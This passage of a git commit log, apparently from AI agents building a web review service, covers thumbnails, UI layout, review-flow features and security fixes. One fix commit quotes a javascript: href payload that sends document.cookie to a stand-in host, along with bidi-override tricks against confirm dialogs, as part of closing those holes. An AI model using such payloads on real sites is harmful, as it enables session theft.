2026-09-23 17:25:12 -07:00
vh c1108a1966 feat(blur): a booth can be fogged as a whole, composing with per-item blur
The operator ruled booth-level blur in and chose reading A for the reveal
("A is fine"). design-dev specced the semantics and owns the controls; this is
the storage half.

COMPOSES, NEVER OVERRIDES. An item is blurred iff the booth is blurred OR it is
in .blurred, so turning booth blur off leaves an agent's per-item choice exactly
as the poster left it. An override would need a per-item "unblurred" exception
list, which is state nobody can see.

Resolved in booth_items, so every surface inherits it for free — Desk strip,
tiles, flag tray, filmstrip, stage all already read Item.blurred and none of
them learns the booth flag exists (INV-1). Images and video only; audio has
nothing to hide from a glance.

A MARKER, deliberately not JSON. `.seen` is JSON because it holds rels that must
round-trip exactly; a boolean has nothing to round-trip, and matching `.forever`
means the two whole-booth flags read the same way. We told design-dev it would
be JSON and it should not be — said so rather than quietly shipping the other
thing.

is_booth_blurred mirrors is_kept's lstat shape WITH THE SAFETY INVERTED, and the
inversion is the point: is_kept fails toward keeping because a failed read must
not authorise a delete; this fails toward HIDING, because a failed read must not
reveal something a poster asked to fog. Both are "the failure does not cause the
loss".

Also records the operator's 2026-09-23 ruling that there is NO 1.0 yet, and adds
.blurbooth to CLAUDE.md's dotfile list. 766 green.
2026-09-23 17:06:37 -07:00
vh 65e7dc2a4e fix(board): a link row could rewrite the dialog that authorises its deletion
Found by design-dev, the same class as the wipe dialog he had just fixed on the
Desk, and reported across the fence rather than kept.

A board row's description and URL are written by any of seventeen agent handles
and were pasted RAW into the `confirm()` the operator reads before approving a
delete. A bidi override (U+202E) or a newline in either re-orders or hides what
he is consenting to, so the row shown is not the row removed.

Escaping does nothing here and that is the trap: autoescape protects the PAGE,
but `confirm` renders a plain string, so the markup defence everyone reaches for
first is irrelevant to the surface that actually carries the decision.

Control and bidi formatting characters now render as U+FFFD — visibly mangled,
never silently re-ordered — through the same helper shape design-dev used, so
the two dialogs cannot drift apart.

Both arguments go through it, and the mutation row defeats exactly that: taking
the raw description back for one of the two turns the test red. 763 green.
2026-09-23 11:31:20 -07:00
vh 995e7b9686 merge(desk): release and wipe move onto the facts line
The operator: "release and x take up space whether or not they're visible."
Confirmed — opacity:0 hid them while still reserving about 100px of side column
and a 36px row. Each control now sits beside the fact it changes ("kept ·
release", "expires in 22h · keep"), always visible, taking no room of its own,
and nothing hides behind a hover that touch screens never had.

d40e8fd is the change; 704e8cd is its heid bug-hunt fold (round Slate):
coarse-pointer touch targets at 28px with wipe clear of zip, control and bidi
characters shown as U+FFFD in the wipe dialog, an unknown data-confirm word
prompting rather than submitting unguarded, and the CSS "code" rule wrapping
anywhere so a long unbreakable install path in the footer stops widening every
page, the Desk included.

A surgical change that still went through a bug-hunt, which is the discipline
paying for itself: the last item was a latent overflow already on main that only
became visible once the row was a flex container.
2026-09-23 11:28:53 -07:00
vh 704e8cd809 fix(desk): the heid bug-hunt panel on the row controls (round "Slate", 4/4)
- Touch: on a coarse pointer every row control is at least 28px square
  again (32px), and wipe stands clear of the zip link. The move onto the
  facts line had dropped the deliberate 28px floor to ~21px, 4-6px from
  zip; with scripts off no confirm fires, so a mis-tap on wipe is the
  delete. The zip link no longer breaks between its glyph and its word,
  and each separator is glued to the item after it.
- The wipe dialog shows the name as it should be read: control and bidi
  formatting characters in an agent-made name show as U+FFFD, so U+202E
  or a newline cannot rewrite what the operator approves. An unknown
  data-confirm word now prompts generically instead of submitting
  unguarded (fail closed).
- No page scrolls sideways: `code` wraps anywhere, so a long unbreakable
  install path in the footer or the empty Desk no longer widens every
  page. The overflow test now sweeps 390/720/850/1000/1400 with the
  heaviest row the Desk draws, and compares scrollWidth with the page's
  own clientWidth.

Its first fixture used a hyphenated path, which wrapped by itself; the
test passed with the bug present until the path became one unbreakable
run. r2_flow.toml: 27/27 proved. 749 passed.
2026-09-23 11:27:34 -07:00
vh 70bfff15cf memory: the cache that aged the thing it cached
Two lessons from the thumbnail work, the second of which nearly shipped.

We parked progressive loading on a count of images and the cost was in bytes.
'Measure the real booth before optimising it' was followed and still gave the
wrong answer, because we measured the dimension that was easy to measure rather
than the one the user feels.

And a cache living inside the thing it describes can age that thing. Excluding
every path under the cache dir passed its own test and was still wrong: creating
the directory touches the BOOTH's own mtime, which is what _newest_mtime seeds
from. The contents were excluded; the existence was the leak. Had it reached the
Desk, one index load would have pushed every booth's expiry out and the TTL
would never have fired again.
2026-09-23 10:58:21 -07:00
vh d40e8fd4a6 fix(desk): a row's keep, release and wipe take no room of their own
Operator, on the live Desk: "release and x take up space whether or not
they're visible." They sat in a side column at opacity 0, which hides a
control and still reserves its box, and hover-only never worked on
touch.

Each control now sits on the facts line beside the state it changes:
release after "kept", keep after a countdown or hold, wipe last. They
are always visible and quiet, and wipe turns danger only under the
pointer or focus. The side column renders only when the row carries a
badge. The row is flex, so an absent column costs no gap. Forms, POST
targets and data-confirm wording are unchanged.

The flex row exposed a latent sizing bug: the stacked Desk column was a
bare 1fr, whose minimum is its content's, so a long nowrap provenance
line scrolled the page sideways at phone width (1029px at 390). It is
now minmax(0,1fr).

Both behaviours have browser tests, mutation-proved (r2_flow.toml:
21/21). Contract C4 amended.
2026-09-23 10:58:15 -07:00
vh ff35023377 test(flow): the Desk strip asserts the thumbnail, and says why it moved
design-dev's test read 'the originals shown small (no generated thumbnail)',
which was true when written and is precisely what the operator rejected: four
images per booth on the page he opens first was the heaviest surface in the
service.

Declared rather than quietly edited, per the rule that an existing assertion is
not changed to make a change pass. The behaviour genuinely changed, on his own
instruction to swap all four small surfaces in one commit.

Worth recording in the docstring: the URL carries ?thumb=1 from the EXTENSION
alone, with no disk read, so a tiny stub fixture still gets the parameter and
the route serves the original when there is nothing worth generating. The URL
never depends on what is on disk.

39/39 falsifiers proved across both mutation tables.
2026-09-23 10:57:04 -07:00
vh 9aa91d5dc7 merge(r2 follow-up): the EACCES blast radius, and r2's falsifier table
design-dev's two follow-up commits on the R2 branch.

167f265 is PRE-EXISTING and his to have found, not his to have caused:
Path.is_file() swallows ENOENT but PROPAGATES EACCES, so one folder with r--
and no x in one booth made booth_items raise — and list_booths calls it for
every booth, so the index 500s for all of them. Identical blast radius to the
0xff filename the bug-hunt panel found, arriving through a different syscall.

39a3cb2 commits R2's own falsifiers as tests/mutations/r2_flow.toml, 18 rows.
Its first run caught three vacuous proofs, which is the fourth time this week
that running the mutation has disagreed with reading the assertion.

# Conflicts:
#	booth/items.py
2026-09-23 10:52:08 -07:00
vh 18d599dd2a fix(thumbs): the cache aged the booth it cached, and two more surfaces
Two corrections to the thumbnail work, the first of them a live bug shipped an
hour ago and caught by design-dev before its worst form landed.

⚠ GENERATING A THUMBNAIL RESET THE BOOTH'S EXPIRY CLOCK. `_newest_mtime`
excludes `.lock` sidecars because machinery is not the operator doing something;
the thumbnail cache is machinery too, and it is written by the SERVER on a mere
view. Excluding the cache's CONTENTS turned out not to be enough — creating
`.thumbs/` touches the BOOTH DIRECTORY's own mtime, which is exactly what
_newest_mtime seeds from. The booth's stamp is now restored across the mkdir,
which cannot hide real activity because any file an agent adds is counted by its
own mtime in the same walk.

The failure this prevents is not small. Once the Desk's preview strip pulls a
thumbnail per booth, ONE INDEX LOAD would have pushed every booth's expiry out
and the TTL would never have fired again — nothing would ever sweep. It was
already live for the gallery, one booth at a time.

TWO MORE SURFACES, because the fix only helped where it was wired:

  Desk preview strip  four small images per booth on the page he opens FIRST.
                      design-dev measured 28 originals / 24.1 MB on a 12-booth
                      copy; live has 28. The heaviest surface in the service,
                      heavier than the gallery it previews.
  flag tray           _marks.html rendered originals as tray thumbnails.

The review stage stays on the original, because that is the full-size review.

754 green plus the new guards.
2026-09-23 10:51:40 -07:00
vh d5e23c7d5f perf(thumbs): the gallery shipped 77 MB to render 250px tiles
The operator found this in about a minute of using the live Desk: "images load
at full resolution instead of calculated thumbnails, which means they load VERY
slowly and are tiny."

MEASURED on the live set:

    sindra-corpus-v1   66 images   77.5 MB   1024x1024 each
    sindra-sfw-pool    59 images   71.7 MB
    sindra             30 images   61.6 MB   2.1 MB average
    sindra-bakeoff     40 images   57.2 MB

A tile renders around 250px, so the grid shipped roughly 16x the pixels that
reach the screen.

⚠ OUR PARKING RATIONALE WAS WRONG IN AN INSTRUCTIVE WAY. ROADMAP parked
progressive loading on "the largest gallery is 66 images; at that size a lazy
grid is almost certainly fine", and the parking-lot row said "270 <img
loading=lazy> may be fine". Both count IMAGES. Neither weighs BYTES. We measured
the dimension that was easy to measure rather than the one that determines the
experience, and 66 really is a fine count sitting on a terrible payload.

booth/thumbs.py caches WebP at 512px longest side inside the booth at
`.thumbs/<rel>.webp` — inside on purpose, so a cache can never outlive what it
describes. Pillow is an optional import: absent, every tile falls back to the
original, so the page is heavier and never broken. Generation is lazy, atomic
(temp + os.replace), rebuilt when the source is newer, and NEVER RAISES.

?thumb=1 rides the EXISTING file route rather than growing a new one, because
that route's traversal guard is already correct and a second route is a second
place to get it wrong.

ALSO FIXES A PRE-EXISTING LEAK THE CACHE WOULD HAVE WALKED INTO. booth_items and
zip_booth both tested `p.name.startswith(".")` — the FILE's name — so
`.thumbs/a.png` (name `a.png`) would have rendered as a gallery item and shipped
inside every zip. CLAUDE.md invariant 2 promises a dotfile costs nothing in item
counts, galleries or zips; that was true only at the top level. Both now skip
every dot-prefixed path COMPONENT.

AND THE FILMSTRIP, which is the same defect in a worse place: it shows EVERY
ring item at a few dozen pixels, so full-resolution frames there cost more than
the grid did. The stage is untouched and stays full size, because that is the
full-size review.

Item.thumb is derived in the resolver, not by a template reasoning about `kind`
(INV-1). build_gallery had to carry it too — a missing key there rendered as a
SILENT fallback to the full image, which is exactly where a new Item field gets
dropped with nothing failing.

754 green.
2026-09-23 10:47:34 -07:00
vh 39a3cb2262 test(r2): commit the round's falsifiers as a mutation table; one flag predicate
tests/mutations/r2_flow.toml: 18 falsifiers, each proved RED under its
change by scripts/mutation_check.py (18/18). Its first run found three
vacuous proofs, now resolved:
- landed_at's per-entry skip: the symlink-loop fixture stopped raising
  once the clock moved to lstat. New fixture: a folder that lists but
  cannot be searched.
- the Desk's bench URL guard: the test covered bookmarks only. A
  hand-edited registry bench now rides with it.
- flagged_targets' `error is None`: defence in depth (hydration already
  strips a damaged mark's target), so no single-guard row; named in the
  table header instead.

The rail's flagged filter and the orphan-flag list read flagged_targets
rather than restating it; no reachable behaviour changes.
2026-09-23 10:38:02 -07:00
vh 167f2657c5 fix(items): an entry the walk cannot stat costs that entry, not every page
Path.is_file() swallows a missing entry but propagates EACCES. A
directory with read and no execute permission lists its names while
every stat under it raises, so one such folder in one booth raised out
of booth_items — and list_booths calls that for every booth, taking the
index down for all of them. The same blast radius as the
unrepresentable-filename case; the same posture applies: such an entry
is not a renderable file.

Predates R2 (identical on main before the merge); found while folding
R2's bug-hunt, where it made landed_at's per-entry skip unreachable.
2026-09-23 10:38:02 -07:00
vh 447a9b67e9 fix(links): the board rendered agent-written javascript: hrefs
A live injection vector on the standing board, found by design-dev in passing,
in code his unit does not touch. Seventeen handles append to links.md and the
operator clicks its rows, so

    javascript:document.location='http://evil.test/'+document.cookie

was a clickable link executing in the Booth's own origin. //evil.test/x and
data:text/html,... rendered too.

links.py now derives is_safe_href once per row and the template links only when
it is true. A refused row still RENDERS, inert and labelled: the operator should
see that something was posted and that we would not link it.

THE NEAR-MISS IS WORTH THE COMMIT MESSAGE. We probed with javascript:alert(1),
watched it get refused, and almost closed this as already-guarded. It is refused
by the MARKDOWN LINK REGEX — alert(1)'s parens break ](...) — not by any guard.
An accident of syntax that happens to catch the one payload everybody reaches
for first. javascript:x=1 walks through. The docstring tells the next person not
to re-probe it with anything containing brackets.

Two things that look like the guard were in the way of finding there wasn't one:
that regex accident, and booth_target's http(s) check, which answers 'which
booth does this URL name' and therefore refuses every legitimate off-board link.
Reading the codebase for 'is there a scheme check' finds it and stops.

Derived in links.py rather than decided in the template, per the same
one-resolver discipline U1 states for item facts: a template that decides safety
is a second place for the rule to be wrong. urlsplit was already imported, so
the stdlib-only invariant holds; verified under system python3 3.11.2 with no
venv. 742 green, 21/21 falsifiers proved.
2026-09-23 10:34:22 -07:00
vh f43a41fb49 docs(roadmap): R2's nine ordering rows, and the zoom-ring row REPLACED not amended
Lifted from r2_flow's INV-2 table rather than rewritten, so the contract and the
roadmap cannot drift into two statements of one rule.

The zoom-ring row is replaced because review_chain filters to media, not
images — 'filtered to images' is now false, and a stale row is invariant 6
failing quietly, which is the only way it ever fails.

The ordinal row is the one worth reading: an ordinal counted across ALL items
makes '#07' the same tile under every filter. The operator refers to artifacts
positionally, and the filters we shipped in U7 had quietly broken that — 'the
third one' meant something different depending on which filter was on. Nothing
on our side noticed; design-dev proposed it unprompted.
2026-09-23 10:29:09 -07:00
vh 225570623d docs: the dotfile list gains .seen, and names the shape a new one should copy
Held until the merge deliberately: this file describes what is deployed, and
writing it while the code sat on another agent's branch would have made our
canonical convention document describe a service that was not running.

Also records a latent bug the R2 work surfaced in code it did not touch.
.blurred stores one stripped rel per line, so a rel carrying a leading space or
a newline does not round-trip and blurring ' a.png' can blur 'a.png'. .seen was
written as a JSON array for that reason, and additionally opens O_NOFOLLOW |
O_NONBLOCK with an S_ISREG check so a planted symlink is refused and a FIFO
cannot hang the read — the outage this repo has already paid for once. New
dotfiles inherit .seen's shape, not .blurred's.
2026-09-23 10:28:52 -07:00
vh 1ddd1c5654 merge(r2): the review flow — the Desk, the lightbox, the reel
design-dev's R2, built against the operator's 2026-09-23 rulings (a_b /
this_arc / plain / no emblem) and handed over clean. Merged, not rebased: the
branch is another agent's work and its seven TDD commits are the record of how
it was built.

Full house discipline on his side, all complete: contract, heid contract panel
(Lark) folded, seam review against the real modules, TDD slices C1-C7, heid
code-review (Wren) 4/4 folded, heid bug-hunt (Nyx) 4/4 folded. Every new browser
test mutation-checked against its own fix.

Reviewed here before taking it, on the three things only this side knows:
  - the quote() guard in the collection loop is intact (it looks like a stray
    try around a discarded call, which is how it would get tidied away; it is
    what stands between one 0xff filename and a 500 on every booth's card)
  - Item.ordinal is APPENDED, not inserted — the mistake we made with
    Item.group and two bug-hunt arms flagged
  - image_chain stays importable and unchanged; review_chain supersedes it only
    for the review route

.seen came back better than specified: O_NOFOLLOW | O_NONBLOCK plus an S_ISREG
check, which defeats a planted symlink AND the FIFO-with-no-writer hang that
cost this service an outage once already, and a JSON array so a rel carrying a
leading space or newline round-trips exactly.

The zoom ring is now review_chain (image, video and audio) rather than
image_chain. That is a declared ordering-rule change and ROADMAP's table moves
with it.
2026-09-23 10:25:20 -07:00
vh 77833dc6d4 fix(r2): the heid bug-hunt panel (round "Nyx", 4/4) — triaged and folded
In-place client (base.html):
- Saves are serialized: POST, re-fetch and swap complete before the next
  save starts, so an older snapshot can no longer land after a newer one.
- A form already queued or in flight ignores another submit; a
  double-click writes one note.
- Dirty controls (drafts, unsent radio choices) and disclosures carry by
  identity (form action + hidden ask/target/mark/f + name), not position.
- Any non-tile structural difference, or a page with no region to swap,
  reloads instead of patching.

Server and templates:
- .seen is a JSON array read without following links or blocking,
  regular files of at most 1 MiB only; malformed, nested-too-deep or
  planted markers read as nothing seen.
- landed_at reads symlinks by lstat and skips one unreadable entry
  instead of pinning the booth in "new".
- The Desk counts flags on current items only; orphan flags are listed
  under the tray with an unmark form.
- Agent-written bench and bookmark URLs link only when http(s).
- Audio and video tiles carry a review link.
- A rel the filesystem cannot represent is a 404, not a 500.
- A non-finite Accept q-value fails to parse.
- The standalone marks page has regions and updates in place.
- The review's next arrow sits at the edge at phone width.

Contract amended for each, plus an accepted-risks section (unlocked
.seen read-modify-write, a planted .viewed symlink, Item.ordinal with
no default).

741 passed. Each new browser test was mutation-checked against its fix;
the serialization test forces the race with a held first refresh, since
localhost alone never lost it.
2026-09-23 10:22:51 -07:00
vh fa5d46443d fix(r2): the heid code-review panel (round "Wren", 4/4) — triaged and folded
Code fixes:
- The narrow-screen fold was specified and never built (4/4). The tray and
  notes are now closed <details> in the aside; above 1000px CSS alone
  (::details-content) shows them and hides the summary. There is no
  script. Browser-tested at 390 and 1400, JS on and off.
- The lightbox gated on parsed board rows, not page identity (3/4). It now
  uses is_board, the lesson the bench panel already carried.
- wants_json returned True at the first good entry, so a malformed later
  entry was never read (3/4). It now parses every entry first; any error
  is False.
- One flag predicate, flagged_targets. It serves the Desk count, the tray,
  the filmstrip, the tape and the review button. An unreadable flag entry
  counts nowhere.
- The header's open count and lifetime line, and the no-set marks panel,
  are now regions (they were stale after an in-place answer).
- Inline group headers render only when every group is one contiguous run.
  Interleaved directories no longer reprint or misfile headers.
- A booth held unreadable has no open_since, even with a readable pick
  beside the damage.
- The swap marks an absent region is-stale instead of leaving it looking
  current. It carries disclosure state (except the sent form's). The
  failure message is readable for 0.9 s before the reload.

Contract amended where the code was right and the text was not: the
wants_json and record_seen signatures, landed_at's three refinements, the
group position being ring-based, the end of the set offering every other
open pick, the Space-key player exception, and the fold mechanism.

New tests cover the parse order; a board with media; the header region; the
no-set panel; interleaved groups; mixed damage; the flag predicate; the
review recording .viewed; the fold at two widths with JS on and off; the
status message before the reload; a lost response after a landed write
(exactly one note); a stale absent region; stage node identity across a
swap; and F with a radio focused. The lost-response and stale tests turn
red under their mutations. 724 passed.
2026-09-23 09:41:18 -07:00
vh 881c7f5df3 docs(r2): correct the provenance of the rewritten keyboard-flag test
The gallery's POST-303-reload was the no-JS design working, and it still
is (the INV-4 golden pins it). The defect was the full-size ejection. The
test's docstring and the contract's assertions table now say so (booth-dev
review).
2026-09-23 09:14:41 -07:00
vh 2511aab3d6 memory: a third way an instrument goes blind — nth-child vs nth-of-type
Credited to design-dev. His R2 order check has a positive control — one tile
given order:-1 that the check must catch — and the control went blind when group
headers became grid children: nth-child(5) started landing on a header rather
than the fifth tile.

Same class as the two defects already in this file. A control that no longer
controls reads exactly like a passing test; nothing in the output distinguishes
'detected nothing because there was nothing' from 'detected nothing because I am
aimed at the wrong element'.

The rule: nth-of-type over nth-child wherever the assertion means the Nth TILE
rather than the Nth child element. They agree until somebody adds a sibling of a
different kind, and adding siblings is what a redesign is.
2026-09-23 09:14:32 -07:00
vh 8acd10a8d2 refactor(r2): drop the kept/ephemeral card CSS; contract marked BUILT
The index no longer renders cards or lanes. Their rules, and the absolute
positioning the keep/wipe controls needed to float over a thumbnail, are
gone. The controls keep their shared button base; the Desk row and the
booth header place them. The contract is marked BUILT on the branch,
pending heid code-review and bug-hunt.
2026-09-23 09:10:34 -07:00
vh f8cb1b29af feat(r2): C6 the review, and C7
- The zoom route becomes the review for image, video AND audio: the native
  player on the stage for sound and video, the Fit/1:1 toggle for pictures
  only. The judgment rail, the tape and the filmstrip are each a data-region.
  The stage never is, so a playing track survives an in-place save.
- The rail shows the whole-set number, K of M in the review ring and the
  position in the group; then the caption, and the flag and notes, landing
  back here (back=view). A pick targeting this item is answerable in place.
  On the last item the end-of-set block lists what was seen, the flags, and
  every other open question.
- The keys are ← → Space F N Esc. Every one is ignored in an editable field,
  and Esc returns to the grid at the tile you were on.
- _marks.html gains picks_only/back_view, so a pick form has one renderer
  wherever it sits.
- In-place swaps now carry an unsaved draft across. A half-typed note
  survives a flag, except in the form that was just sent.
- The filmstrip keeps the current frame in view.
- C7: no emblem in the chrome, pinned.

Browser tests cover: F typed into the note stays a letter and does not
flag; F outside the note flags in place and the draft survives; Space
moves; Esc lands on the grid tile. 706 passed.
2026-09-23 09:06:15 -07:00
vh 50f88a3e5e feat(r2): C5 the lightbox, and the in-place client
- On a gallery booth the marks panel moves into a sticky verdict aside
  beside the set. The aside comes first in the document, so a narrow screen
  stacks the question above the work; grid areas place it on the right when
  wide. Nothing in an ordered collection moves. Boards are unchanged.
- The flag tray lists flagged items by tile number: the declared change
  from the panel list's (created, id). The standalone marks page keeps the
  list.
- Inline group headers are divs, never figure.item.
- Every mark-dependent element is a data-region: the verdict, each tile,
  the rail's filter counts. There is also a server-rendered status line.
- The in-place script (base.html) POSTs with an explicit JSON Accept, then
  on 204 swaps every region from a fresh GET. Live media and per-viewer view
  state are carried across the swap, so there is no layout jolt and no
  stopped track. It never re-POSTs: on failure it says so and reloads. Tile
  controls re-bind after a swap, and the grid cursor survives it.
- The `n` key opens the tile's closed note disclosure before focusing it.
- test_embed_browser's keyboard-flag test expected a navigation, which is
  the defect R2 removes. It is updated as declared in the contract, and
  tightened: a window marker must survive, proving no reload.

Browser tests: flag in place, with no reload and no scroll jump, and the
tile, tray and rail count all updated; and a failed save that reloads
without re-POSTing. Two mutations turn them red (no carry, no rail region).
700 passed.
2026-09-23 08:57:36 -07:00
vh ce27b06f32 feat(r2): C4 the Desk — the index triaged by what needs the operator
- list_booths gains open_since (parsed, never compared as text), flags,
  landed_at (content only; a new, differently named clock, INV-5),
  viewed_at, and a four-image preview that keeps blur.
- The index renders needs you / new since you looked / everything else,
  always in that order. Needs you includes unreadable marks, so a damaged
  judgment file cannot hide. Everything else keeps list_booths' order
  rather than stating a second rule. An empty section renders nothing.
- The side column holds live benches (a damaged registry says so),
  bookmarks from BOOTH_LINKS_BOARD with booth URLs left out (capped at 8),
  and the pickup form.
- test_booth's kept-lane test is rewritten as the contract declared: kept
  is a fact on each row, not a lane.

Two of the new tests were VACUOUS on their first draft, and mutation-
checking caught both. The clocks test used a future t0, so a hand-set
marker outranked every real write. The look-then-judge test followed the
flag's 303, and the resulting GET recorded a fresh look. Both are fixed
and now go red under their mutation.
2026-09-23 08:45:54 -07:00
vh b9750d221a feat(r2): C3 server side — 204 on an explicit JSON Accept, and back=view
- wants_json: true only for an exact `application/json` entry with q > 0.
  Absent, empty, wildcard, application/*, near misses, q=0 and malformed
  headers all fall through to the 303.
- The four mark routes share one exit, _mark_done: 204 with no body for the
  in-place client, otherwise _mark_redirect unchanged.
- back=view lands on /b/<name>/view?f=<rel>#rail, only for a media item of
  this booth. It is built from the resolved rel and never echoed. Anything
  else takes the no-`back` landing.
- tests/golden/r2_mark_303.json: 108 responses recorded from the PRE-R2
  code (6 route cases x back absent|marks x 9 non-JSON Accepts), replayed
  byte for byte (INV-4). Two mutations (q>=0, substring match) turn it red.
- The contract now states the q=0 rule.
2026-09-23 08:36:54 -07:00
vh 277554a3f7 feat(r2): C1 ordinals and C2 the review ring and .seen
- Item.ordinal: the 1-based position in booth_items over the items that
  render. It is appended, and set in the resolver. Tiles print it padded to
  the whole set's width, and a filter never renumbers.
- review_chain: the item order filtered to media. It replaces image_chain as
  the zoom route's ring, so a set of pictures and sound steps through both.
  image_chain stays importable.
- .seen: which media items were looked at full size, written by the review
  route under record_view's gate. It is rewritten whole: deduplicated, pruned
  to live items, sorted. The temp file is created with O_EXCL and swapped in
  with os.replace, so a planted symlink is replaced, never written through.
  It never raises.

Nine new tests. The contiguity and symlink tests are mutation-checked.
669 passed.
2026-09-23 08:32:38 -07:00
vh 7a4d3fcbf8 docs(contract): r2 — fold the heid contract panel (round "Lark", 4/4 arms)
Triaged, not adopted wholesale. Folded:
- Reviewing refreshes .viewed, as it already did. It is now stated, so the
  two clocks cannot read as disagreeing.
- INV-4 is scoped to pre-R2 request shapes. back=view is the declared
  exception.
- back=view lands on the review only for media items. Anything else falls
  back to the booth page.
- In-place regions: every element whose content can depend on marks is a
  region, including the rail counts, the filmstrip and the tape. The stage
  never is.
- The script never re-POSTs. A lost response must not duplicate a note or
  re-date an answer.
- The dangling "invariant 5" now points at the Booth's CLAUDE.md invariant 5.
- "M" is defined once. Needs-you is picks only. Every key is suppressed in
  editable fields.
- The toggle and the narrow collapse are classified against INV-3.
- Every Booth state file is a dotfile, stated. So are "no generated
  thumbnails" and the audio placeholder.
- The requirement wording is tightened, and C7 records the voice and emblem
  rulings.
2026-09-23 08:27:13 -07:00
vh ea44c18d42 docs(contract): r2 — fold booth-dev's items.py notes and the empty-section negative
Ordinal is appended, not inserted. The quote() guard stays, and skipped
items take no ordinal. Empty Desk sections do not render; this carries
forward the negative half of the kept-lane pair. The 1:1 toggle is bound
only when the stage is an image.
2026-09-23 08:18:01 -07:00
vh 051599a30e docs(contract): r2 — the review flow: the Desk, the lightbox, the review
PROPOSED. Ruled by the operator 2026-09-23 (flow: a_b, compare this_arc,
voice plain, emblem no). Compare is not in this contract; it follows as r3.
Seam-reviewed against the live module surfaces before the cross-frontier
contract panel returned. Four findings are folded in: Mark.created is a
string, the board is BOOTH_LINKS_BOARD, the bench-read error state, and an
unreadable marks file counting as needing the operator.
2026-09-23 08:15:32 -07:00
vh bf55364920 fix(theme): at phone width the JS-off rail fallback is the measured worst case
booth-dev suggested this. At or below 480px, .item's scroll-margin
fallback is 205px, the 16-group rail measured at 390px. With JS on,
--rail-h is exact and nothing changes.

Measured on the same 76 jumps:
- JS off: 0 under the rail, previously 19. At 390px, where a short rail
  gets the full fallback, tiles overshoot by at most 74px, and they stay
  visible.
- JS on: unchanged, 0 under.

660 passed; visual order still matches document order on 32 renders.
2026-09-23 08:12:54 -07:00
vh e8e49ceb14 fix(theme): a group jump lands its tile below the sticky rail, not under it
Heid bug-hunt finding (Gróa, relayed by booth-dev). The rail is sticky
and nothing set a scroll margin, so a fragment jump left the target tile,
and the :target reticle that marks it, hidden under the rail.

The rail wraps, so no CSS value can know its height. A small additive
script publishes the measured height as --rail-h, and a ResizeObserver
keeps it current across widths. .item's scroll-margin-top adds 12px to
that. With JS off, a 120px fallback applies.

Also styles the new empty-filter row (397ea89): the filter name in
heading ink, and a gap before the way back.

Measured, 76 group jumps across 2 booths x 4 widths (rail 48-205px):
- JS on: 0 under the rail, minimum clearance 11px.
- JS off: 0 at desktop widths. 19 at 390px, where a wrapped rail is
  143-205px tall and taller than the fallback.
Positive control: the pre-retheme skin fails 74/76.
Merged onto main 1826d19: 660 passed, mutation_check 20/20.
2026-09-23 08:12:54 -07:00
vh 744fa5263e feat(theme): SVOS retheme — concept-round candidate
Re-skins every Booth surface in the SVOS design system (design-systems
palettes/svos @ ed2f8d8). Visual and interaction layer only: no route,
no copy, no ordering and no information-architecture change.

- _svos_tokens.css: SVOS semantic tokens vendored by copy, with the four
  [data-theme] scopes re-scoped onto prefers-color-scheme and
  prefers-contrast (dark, light, dark-hc, light-hc). Included into
  base.html's <style>; cached at startup like every other template.
- base.html: the accreted Australis sheet is rewritten against semantic
  tokens only. It also fixes four undefined variables (--line, --bg,
  --fg, --muted) that the keep/blur/reveal controls had been reading.
  The three SVOS devices each have exactly one job: reticle = selection
  (grid cursor, :target, picked option), hazard = irreversible (Wipe
  now, armed bulk delete), glow = live power (service dot, live bench).
- The flag list renders as wrapped chips, so a large flag set no longer
  pushes the grid below the fold. The list order is unchanged.
- IBM Plex Sans + JetBrains Mono load via Google Fonts with
  display=swap and system fallbacks (approved by booth-dev).
- view.html, doc.html: inline styles moved onto tokens.
- embed.js: fragment palette as custom properties scoped to .bk-ask;
  `.bk-ask-opt:has(input:checked)` still appears exactly once.
- Favicon (base.html + app.FAVICON_HREF, kept in sync): graphite tile
  with reticle corners.

Verified: 642 passed, the same count as the pre-change baseline.
Visual order matches document order on 32 renders (4 booths x 4 widths
x 2 schemes). A positive control, one tile given `order:-1`, is
detected by the same check.
2026-09-23 08:12:54 -07:00
vh b46ac02be2 docs: the four flow rulings, compare unparked, and the beta premise superseded
All four ruled, all four taking design-dev's recommendation, relayed via Miranda
with booth-dev as sole relay. Verbatim copy committed at docs/rulings/ because
the booth holding it will sweep.

Which is the observation worth keeping: answering a pick removes the hold that
was protecting the record. A booth is held while its question is OPEN, so its
lifetime is shortest exactly when it has just become valuable — before the
answer it is a question, after it is the record of a decision, and only the
first state is protected. Both design booths hit this by different routes, one
withdrawn and one answered. Raised to design-dev as a flow question rather than
patched, since flow is his now.

Compare mode leaves the parking lot: our deferral, his overrule, recorded as his
call so nobody re-parks it by reading the older rule.

And v1.0.0b1's 'no new features' promise no longer describes the arc. The tag
stays as written — rewriting a released tag to flatter the present is how a
version stops being evidence — an alpha drop-back is illegal because 1.0.0a2
sorts below 1.0.0b1, and no further pre-release is cut until the arc lands.
2026-09-23 08:12:05 -07:00
vh f87976b54d memory: correct a review point we got wrong, rather than leave it to be re-asserted
We read design-dev's 'SET order' as 'the order they were set in' and told him it
was already (created, id). He meant the SET's order — by tile number — which
genuinely differs: flag #15 then #07 and today's panel lists #15, #07 while his
tray lists #07, #15.

His rule is also cleaner than the one we proposed. The flag set sorted by its
target's position in sorted(rel) is a total order needing no tie-break at all,
because rels are unique. The memory row now says so explicitly and tells the
next session not to re-raise the point.

Round 1's booth is kept; he releases it once the flow ask is ruled.
2026-09-23 07:21:19 -07:00
vh af57933255 memory: round 2 is up, and the ordering review that preceded it
Four rulings with the operator on booth-flow-concepts. design-dev asked for an
invariant-6 check before building, which is the right order and worth recording
as the pattern.

His ordinals rule is an improvement on invariant 6 rather than compliance with
it: an ordinal counting across all items makes a positional reference stable
under filters, where today 'the third one' silently means something different
the moment a filter is on. Nothing on our side had noticed.

Two corrections returned. Flag 'set order' is already (created, id) — set_flag
upserts and unflag removes the entry, so created IS the set time; what he
actually needs is the tie-break, not a new field. And 'last activity' must reuse
_newest_mtime, whose .lock exclusion was paid for: counting our own lock
sidecars made reading through a write path look like activity.
2026-09-23 07:20:28 -07:00
vh 6ba5a83f81 docs: the operator moved the design ownership boundary, and the fence was ours
Round 1 ruled not-as-shown: 'He didn't go far enough, still looks like the
booth. I want him to consider the flow and the requirements — design touches,
layout, usability all belong to him.'

The handoff paragraph that said we were not asking for layout changes driven by
information architecture is void. design-dev's 'class additions only, no
reordering' was that constraint honoured, so the ruling corrects our brief
rather than his round — worth recording that way round, because the next session
reading only the artifact would read it as a design failure.

Flow, layout, usability and the requirements are his now; the IA is no longer
fenced off. What survives is split in two on purpose: correctness invariants
that are not design opinions, and engineering defaults we chose that he may now
argue with, where a dispute goes to the operator rather than being settled
